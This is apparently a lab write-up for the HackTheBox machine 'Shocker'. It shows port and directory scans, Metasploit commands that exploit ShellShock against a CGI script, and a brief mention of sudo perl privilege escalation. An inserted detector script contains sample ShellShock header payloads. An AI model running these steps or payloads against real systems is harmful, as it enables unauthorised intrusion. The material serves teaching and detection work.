Basic information

Port scan

Ports 80 and 2222 are open:

$ nmap -sC -sV 10.10.10.56
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-25 14:16 CST
Nmap scan report for 10.10.10.56
Host is up (0.070s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.98 seconds

Port 80

Just a single image:

Directory scan

Directory scanning reveals a user.sh file (common wordlists really don't contain it...):

➜  ~ gobuster dir -u http://10.10.10.56/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 50
...
/cgi-bin/ (Status: 403)
/index.html (Status: 200)
/server-status (Status: 403)
...

➜ ~ gobuster dir -u http://10.10.10.56/cgi-bin/ -w /usr/share/seclists/Discovery/DNS/dns-Jhaddix.txt -t 50
...
/user.sh (Status: 200)
...

user.sh

Content-Type: text/plain

Just an uptime test script

01:21:49 up 6 min, 0 users, load average: 0.24, 0.07, 0.02

CVE-2014-6271

An sh script served from cgi-bin points to Apache's mod_cgi, which means CVE-2014-6271 (ShellShock); msf exploits it in one shot:

msf6 > use exploit/multi/http/apache_mod_cgi_bash_env_exec
set rhosts 10.10.10.56
set targeturi /cgi-bin/user.sh
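For the defensive side of the same bug, the following added example (not part of the original writeup) checks request headers for the ShellShock pattern that mod_cgi passes into bash through environment variables such as HTTP_USER_AGENT: a function definition `() { ... }` followed by trailing commands. The header lines are constructed samples, not captured from 10.10.10.56.

```python
import re

# CVE-2014-6271 signature: a bash function body "() { ... }" with commands
# appended after the closing brace. Vulnerable bash versions executed those
# trailing commands while importing the variable from the CGI environment.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;\s*(\S.*)")

# Constructed sample request-header lines, as a reverse proxy or WAF might log
# them for a request to /cgi-bin/user.sh (assumed log format, not real traffic).
SAMPLE_HEADERS = [
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64)",
    "User-Agent: () { :; }; echo vulnerable",
    "Referer: () { ignored; }; echo vulnerable",
    "Cookie: session=abc123; theme=dark",
]


def find_shellshock(header_line):
    """Return (header_name, trailing_command) when a header value carries a
    ShellShock-style payload, otherwise None."""
    name, sep, value = header_line.partition(":")
    if not sep:
        return None  # not a "Name: value" header line
    match = SHELLSHOCK_RE.search(value)
    if not match:
        return None
    return name.strip(), match.group(1).strip()


def scan_headers(lines):
    """Run the check over a batch of header lines and collect the hits."""
    return [hit for hit in (find_shellshock(line) for line in lines) if hit]


if __name__ == "__main__":
    for header, command in scan_headers(SAMPLE_HEADERS):
        print(f"ShellShock pattern in {header}: trailing command {command!r}")
```

Any hit against a host that exposes CGI scripts is worth an alert; the real fix is the patched bash package, since the pattern match only catches the unobfuscated form.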

user flag

We are now the shelly user, and user.txt is in the home directory:

Privilege escalation info

perl can be run via sudo without a password; exploitation method:

Privilege escalation & root flag

Then escalate privileges directly and read root.txt:

References